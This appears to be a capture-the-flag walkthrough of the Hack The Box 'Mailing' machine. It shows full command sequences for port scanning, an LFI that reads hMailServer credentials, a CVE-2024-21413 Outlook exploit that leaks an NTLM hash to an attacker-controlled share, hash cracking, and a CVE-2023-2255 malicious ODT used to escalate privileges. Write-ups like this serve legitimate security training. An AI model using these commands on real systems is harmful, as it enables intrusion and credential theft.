- Enumeration
- Port Scans
- nmap - TCP All ports scan
- HTTP
- Directories / Files
- Local File Inclusion (LFI)
- Exploitation
- User Flag
- Locating Credentials
- Decrypting Credentials
- Verify Credentials
- CVE-2024-21413
- user.txt
- Root flag
- Enumeration of Exploit
- CVE-2023-2255
- root.txt
Enumeration
Port Scans
nmap - TCP All ports scan
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/mailing/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/mailing/results/scans/xml/_full_tcp_nmap.xml" mailing.htbPort | State | Service | Version |
25/tcp | open | smtp | hMailServer smtpd |
80/tcp | open | http | Microsoft IIS httpd 10.0 |
110/tcp | open | pop3 | hMailServer pop3d |
135/tcp | open | msrpc | Microsoft Windows RPC |
139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
143/tcp | open | imap | hMailServer imapd |
445/tcp | open | microsoft-ds | |
465/tcp | open | smtp | hMailServer smtpd |
587/tcp | open | smtp | hMailServer smtpd |
993/tcp | open | imap | hMailServer imapd |
5040/tcp | open | unknown | |
5985/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
7680/tcp | open | pando-pub | |
47001/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
49664/tcp | open | msrpc | Microsoft Windows RPC |
49665/tcp | open | msrpc | Microsoft Windows RPC |
49666/tcp | open | msrpc | Microsoft Windows RPC |
49667/tcp | open | msrpc | Microsoft Windows RPC |
49668/tcp | open | msrpc | Microsoft Windows RPC |
49669/tcp | open | msrpc | Microsoft Windows RPC |
HTTP
Directories / Files
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 --url http://mailing.htb/ -x txt,php,html -C 403,301,302,400,404
Local File Inclusion (LFI)
Testing of the found download.php file indicates that there is an LFI.
LFI Payload list was taken from https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI payloads.txt.
To further explain the command below. The --hh 15,1213 is used to filter out the responses that we don’t want these being the 15 character response indicating File not found. and the 1213 character response which is the generic Internal Server Error.
wfuzz -w LFI\ payloads.txt -u http://mailing.htb/download.php?file=FUZZ --hh 15,1213
We can verify this using the curl command.
curl http://mailing.htb/download.php?file=../../../../../Windows/win.ini
Exploitation
User Flag
Locating Credentials
As shown in the port scan results this server appears to be running hMailServer. We can dump the credentials using the LFI found previously.
curl http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini
Decrypting Credentials
CrackStation can be used to decrypt the credentials found in the AdministratorPassword field in the hMailServer.ini file.
Verify Credentials
telnet mailing.htb 110
USER administrator@mailing.htb
PASS homenetworkingadministrator
LIST
CVE-2024-21413
- Clone the repository.
git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability.git
- Setup responder.
sudo responder -I tun0
- Run exploit.
python3 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.8\admin' --subject Lulz
- Receive credentials to responder after a short period.
maya::MAILING:0b4b9d5848aab6f9:089A3CA775DB3513CA7AB33F32A7B2D7:010100000000000080D10DB715A2DA01D4791C6A0BE36A1D0000000002000800310049003200550001001E00570049004E002D004700330036004C0033004A004B00520058004400550004003400570049004E002D004700330036004C0033004A004B0052005800440055002E0031004900320055002E004C004F00430041004C000300140031004900320055002E004C004F00430041004C000500140031004900320055002E004C004F00430041004C000700080080D10DB715A2DA0106000400020000000800300030000000000000000000000000200000A24D7591CC30AC7D469F9ADA3B1A9D149A23525825A7F791C5EA10FE5E77D8930A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0038000000000000000000
- Crack the hash.
echo 'maya::MAILING:0b4b9d5848aab6f9:089A3CA775DB3513CA7AB33F32A7B2D7:010100000000000080D10DB715A2DA01D4791C6A0BE36A1D0000000002000800310049003200550001001E00570049004E002D004700330036004C0033004A004B00520058004400550004003400570049004E002D004700330036004C0033004A004B0052005800440055002E0031004900320055002E004C004F00430041004C000300140031004900320055002E004C004F00430041004C000500140031004900320055002E004C004F00430041004C000700080080D10DB715A2DA0106000400020000000800300030000000000000000000000000200000A24D7591CC30AC7D469F9ADA3B1A9D149A23525825A7F791C5EA10FE5E77D8930A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0038000000000000000000' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
- Verify the user credentials.
evil-winrm -u maya -p m4y4ngs4ri -i mailing.htb
user.txt
type ..\Desktop\user.txt
whoami
Root flag
Enumeration of Exploit
If we enumerate the scheduled tasks we see that there is one running as localadmin.
schtasks /query /fo LIST /tn "Test" /v
We can also verify that this user is in fact a member of the Administrators group.
net user localadmin
Enumeration of the Program Files directory shows us that LibreOffice is installed.
Viewing the readme_en-US.txt file we can see that version 7.4 is currently installed.
Get-Content 'C:\Program Files\Libreoffice\readmes\readme_en-US.txt' | Select-Object -First 10
This appears to be vulnerable to CVE-2023-2255. Viewing this exploit shows that it involves the use of a malicious ODT file. The last thing we need to work out is where to place the file so that the scheduled task will pick it up and run it.
The root of the C:\ shows a folder called Important Documents which looks like a likely candidate.
If we view the contents the folder is empty. So we write a small test file to the folder, confirm it has actually been written then wait a few minutes and check again to find that it has been removed. OK so something is happening to this folder to clear the contents.
ls
echo 'test' > dummyfile.txt
ls
# Wait a few minutes
ls
CVE-2023-2255
Clone the repository and generate the exploit. Be sure to take note of the group name Administradores (Don’t appear to be using English language).
cd CVE-2023-2255
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
File exploit.odt has been created !
Upload the file to the Important Documents directory.
upload /home/kali/htb/mailing/CVE-2023-2255/exploit.odt
We can see the document has been uploaded and that we are currently not a member of the Administradores group.
ls
net localgroup Administradores
So we wait for a minute or 2 for the document to be processed. Then run the above commands again. We can see that the document has now been removed and that the user maya is a member of the Administradores group.
ls
net localgroup Administradores
Now we simply reconnect with Evil-WinRM to ensure that the user has the newly added group membership.
evil-winrm -u maya -p m4y4ngs4ri -i mailing.htbroot.txt
Now we can just dump the root.txt file as maya. Sure you can use maya to dump hashes and login to the localadmin account but it just isn’t required. As long as you logged out and back in after running the exploit to ensure that the group membership change has taken affect you should have all the permissions you need.
type C:\Users\localadmin\Desktop\root.txt